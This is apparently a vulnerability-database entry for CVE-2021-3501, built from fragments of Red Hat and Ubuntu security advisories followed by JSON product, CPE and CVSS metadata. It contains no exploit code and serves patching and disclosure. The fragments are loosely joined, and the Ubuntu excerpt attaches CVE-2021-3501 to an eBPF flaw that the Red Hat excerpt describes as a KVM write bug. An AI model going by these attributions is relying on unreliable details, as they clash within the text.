  • RHACM 2.2.4 images (BZ# 1957254)

  • Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832)

  • ACM Operator should support using the default route TLS (BZ# 1955270)

  • The scrolling bar for search filter does not work properly (BZ# 1956852)

  • Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)

  • The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181)

  • Unable to make SSH connection to a Bitbucket server (BZ# 1966513)

  • Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 1967890)

  • Bugs fixed (https://bugzilla.redhat.com/):

1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.16. See the following advisories for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2287

Space precludes documenting all of the container images in this advisory.

Additional Changes:

This update also fixes several bugs. Documentation for these changes is available from the Release Notes document linked to in the References section. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1932638 - Removing ssh keys MC does not remove the key from authorized_keys 1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster 1937396 - when kuryr quotas are unlimited, we should not sent alerts 1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP 1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1940275 - [IPI Baremetal] Revert Sending full ignition to masters 1942603 - [4.7z] Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork 1944046 - Warn users when using an unsupported browser such as IE 1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1945702 - Operator dependency not consistently chosen from default channel 1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1947091 - Incorrect skipped status for conditional tasks in the pipeline run 1947427 - Bootstrap ignition shim doesn't follow proxy settings 1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret 1949541 - Kuryr-Controller crashes when it's missing the status object 1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation 1951210 - Pod log filename no longer in -.log format 1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after install 1955210 - OCP 4.6 Build fails when filename contains an umlaut 1955418 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955482 - [4.7] Drop high-cardinality metrics from kube-state-metrics which aren't used 1955600 - e2e unidling test flakes in CI 1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry 1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. 1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1957499 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1958873 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions 1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set 1960093 - Console not works well against a proxy in front of openshift clusters 1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services 1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960589 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics 1960686 - GlobalConfigPage is constantly requesting resources 1961069 - CMO end-to-end tests work only on AWS 1961367 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1962493 - Kebab menu of taskrun contains Edit options which should not be present 1962637 - Nodes tainted after configuring additional host iface 1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals" 1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP's 1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1963243 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1964322 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1966358 - Build failure on s390x 1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud 1967966 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967972 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1970322 - [OVN]EgressFirewall doesn't work well as expected

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: Red Hat Virtualization Host security update [ovirt-4.4.6] Advisory ID: RHSA-2021:2522-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2021:2522 Issue date: 2021-06-22 CVE Names: CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 CVE-2021-27219 =====================================================================

  1. Summary:

An update for imgbased, redhat-release-virtualization-host, and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64

  1. Description:

The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

Security Fix(es):

  • glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)

  • kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)

  • polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)

  • hw: vt-d related privilege escalation (CVE-2020-24489)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • Previously, systemtap dependencies were not included in the RHV-H channel. Therefore, systemtap could not be installed. In this release, the systemtap dependencies have been included in the channel, resolving the issue. (BZ#1903997)

  • Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/2974891

  1. Bugs fixed (https://bugzilla.redhat.com/):

1903997 - Provide systemtap dependencies within RHV-H channel 1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits 1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run 1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() 1962650 - CVE-2020-24489 hw: vt-d related privilege escalation

  1. Package List:

Red Hat Virtualization 4 Hypervisor for RHEL 8:

Source: redhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm

x86_64: redhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm

RHEL 8-based RHEV-H for RHEV 4 (build requirements):

Source: redhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm

noarch: redhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm

x86_64: redhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2020-24489 https://access.redhat.com/security/cve/CVE-2021-3501 https://access.redhat.com/security/cve/CVE-2021-3560 https://access.redhat.com/security/cve/CVE-2021-27219 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYNH6EtzjgjWX9erEAQg8rBAApw3Jn/EPQosAw8RDA053A4aCxO2gHC15 HK1kJ2gSn73kahmvvl3ZAFQW3Wa/OKZRFnbOKZPcJvKeVKnmeHdjmX6V/wNC/bAO i2bc69+GYd+mj3+ngKmTyFFVSsgDWCfFv6lwMl74d0dXYauCfMTiMD/K/06zaQ3b arTdExk9VynIcr19ggOfhGWAe5qX8ZXfPHwRAmDBNZCUjzWm+c+O+gQQiy/wWzMB 6vbtEqKeXfT1XgxjdQO5xfQ4Fvd8ssKXwOjdymCsEoejplVFmO3reBrl+y95P3p9 BCKR6/cWKzhaAXfS8jOlZJvxA0TyxK5+HOP8pGWGfxBixXVbaFR4E/+rnA1E04jp lGXvby0yq1Q3u4/dYKPn7oai1H7b7TOaCKrmTMy3Nwd5mKiT+CqYk2Va0r2+Cy/2 jH6CeaSKJIBFviUalmc7ZbdPR1zfa1LEujaYp8aCez8pNF0Mopf5ThlCwlZdEdxG aTK1VPajNj2i8oveRPgNAzIu7tMh5Cibyo92nkfjhV9ube7WLg4fBKbX/ZfCBS9y osA4oRWUFbJYnHK6Fbr1X3mIYIq0s2y0MO2QZWj8hvzMT+BcQy5byreU4Y6o8ikl hXz6yl7Cu6X7wm32QZNZMWbUwJfksJRBR+dfkhDcGV0/zQpMZpwHDXs06kal9vsY DRQj4fNuEQo= =bDgd -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree (BZ#1957489)

  • Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64

Bug Fix(es):

  • OVS mistakenly using local IP as tun_dst for VXLAN packets (?) (BZ#1944667)

  • Selinux: The task calling security_set_bools() deadlocks with itself when it later calls selinux_audit_rule_match(). (BZ#1945123)

  • [mlx5] tc flower mpls match options does not work (BZ#1952061)

  • mlx5: missing patches for ct.rel (BZ#1952062)

  • CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets get dropped for seconds in a row (BZ#1952065)

  • [Lenovo 8.3 bug] Blackscreen after clicking on "Settings" icon from top-right corner. (BZ#1952900)

  • RHEL 8.x missing uio upstream fix. (BZ#1952952)

  • Turbostat doesn't show any measured data on AMD Milan (BZ#1952987)

  • P620 no sound from front headset jack (BZ#1954545)

  • RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. (BZ#1955188)

  • [net/sched] connection failed with DNAT + SNAT by tc action ct (BZ#1956458)

  • ========================================================================== Ubuntu Security Notice USN-4983-1 June 03, 2021

linux-oem-5.10 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)

Piotr Krysiuk and Benedict Schlueter discovered that the eBPF implementation in the Linux kernel performed out of bounds speculation on pointer arithmetic. A local attacker could use this to expose sensitive information. (CVE-2021-29155)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3501)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.10.0-1029-oem 5.10.0-1029.30 linux-image-oem-20.04 5.10.0.1029.30 linux-image-oem-20.04b 5.10.0.1029.30

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202105-0904",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "red hat enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "db": "PACKETSTORM",
        "id": "162890"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-3501",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 3.6,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-3501",
            "impactScore": null,
            "integrityImpact": "Partial",
